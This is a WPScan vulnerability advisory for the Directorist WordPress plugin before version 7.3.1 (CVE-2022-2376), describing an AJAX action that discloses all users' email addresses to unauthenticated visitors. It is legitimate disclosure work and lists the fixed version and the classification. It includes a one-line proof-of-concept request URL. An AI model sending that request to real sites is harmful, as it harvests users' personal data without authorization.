WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Directorist < 7.3.1 - Unauthenticated Email Address Disclosure

Description

The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=directorist_author_pagination

Affects Plugins

directorist
Fixed in version 7.3.1

References

CVE
CVE-2022-2376

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Submitter twitter
kazet1234
Verified

Yes

WPVDB ID
437c4330-376a-4392-86c6-c4c7ed9583ad

Timeline

Publicly Published

2022-08-10 (about 1 months ago)

Added

2022-08-10 (about 1 months ago)

Last Updated

2022-08-10 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin